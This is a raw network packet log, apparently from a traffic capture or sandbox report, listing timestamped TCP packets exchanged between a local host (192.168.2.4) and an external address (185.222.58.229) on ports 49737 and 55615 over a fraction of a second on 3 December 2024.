                                                                                                                                                Dec 3, 2024 13:27:13.870686054 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870707035 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870728970 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870748043 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870770931 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870786905 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870826960 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.870902061 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870913029 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.870949030 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.941888094 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.941941023 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.941972017 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.942447901 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.988837957 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.988850117 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.988894939 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.988909006 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.988955021 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.988980055 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.988987923 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.988991976 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.989028931 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.989090919 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989100933 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989145041 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.989175081 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989420891 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989429951 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989476919 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.989487886 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989521980 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989537001 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.989553928 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.989667892 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989677906 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989722013 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.989752054 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989770889 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989809990 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.989923000 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.989962101 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990210056 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990217924 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990233898 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990252972 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990264893 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990298986 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990339994 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990365982 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990398884 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990411997 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990432978 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990477085 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990531921 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990674973 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990686893 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990708113 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990720034 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990739107 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990750074 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.990916014 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990926027 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990936995 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.990955114 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991007090 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991064072 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991072893 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991152048 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991189957 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991225958 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991256952 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991266966 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991276979 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991331100 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991385937 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991394997 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991467953 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991476059 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991518974 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991585016 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991604090 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991621971 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991645098 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991719007 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991729021 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991780043 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991808891 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991817951 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991869926 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991889000 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991915941 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.991926908 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991936922 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991978884 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.991983891 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992023945 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992033005 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992104053 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992147923 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992170095 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992178917 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992214918 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992261887 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992281914 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992402077 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992409945 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992434978 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992459059 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992568016 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992577076 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992619038 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992631912 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992650032 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992670059 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992691040 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992705107 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992713928 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992755890 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992793083 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992824078 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992867947 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992914915 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992924929 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992958069 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.992974043 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.992990971 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993032932 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993117094 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993127108 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993165970 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993196011 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993206024 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993242025 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993279934 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993299007 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993308067 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993345022 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993362904 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993372917 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993406057 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993499041 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993508101 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993525982 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993531942 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993535042 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993556976 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993561029 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993576050 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993592024 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993602037 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993624926 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993726015 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993767977 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993802071 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993817091 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993833065 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.993834972 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993875980 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993954897 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.993966103 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994012117 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994050026 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994057894 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994066000 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994074106 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994076967 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994091034 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994091988 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994102001 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994110107 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994117975 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994122028 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994148970 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994164944 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994235039 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994244099 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994251013 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994257927 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994266033 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994283915 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994304895 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994313955 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994360924 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994369984 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994379044 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994386911 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994415045 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994437933 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994452953 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994465113 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994474888 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994484901 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994492054 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994505882 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994518995 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994528055 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994538069 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994565964 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994570971 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994695902 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994710922 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994745970 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994757891 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994769096 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.994818926 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:13.994957924 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:13.997776031 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.062419891 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.062453985 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.062482119 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.062510014 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.062669992 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.062717915 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.062803984 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.062892914 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109268904 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109282017 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109291077 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109302998 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109321117 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109338045 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109359026 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109380960 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109384060 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109419107 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109463930 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109472990 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109503031 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109549999 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109589100 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109630108 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109643936 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109658957 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109664917 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109836102 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109905005 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109915972 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109925032 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.109966040 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.109998941 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110034943 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110080957 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110121012 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110169888 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110315084 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110323906 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110337973 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110346079 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110394001 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110434055 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110444069 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110469103 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110481024 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110542059 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110551119 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110589027 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110605001 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110637903 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110641003 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110672951 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110682964 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110692978 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110758066 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110773087 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110790968 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110867023 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110878944 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.110886097 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110910892 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.110927105 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111006975 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111016989 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111066103 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111103058 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111112118 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111145020 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111232042 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111239910 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111268044 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111290932 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111396074 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111406088 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111553907 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111592054 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111601114 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111635923 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111690998 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111700058 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111752033 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111772060 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111812115 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111871958 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.111942053 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.111958981 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.112008095 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.112030029 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.112039089 CET5561549737185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:14.112075090 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:14.112104893 CET5561549737185.222.58.229192.168.2.4
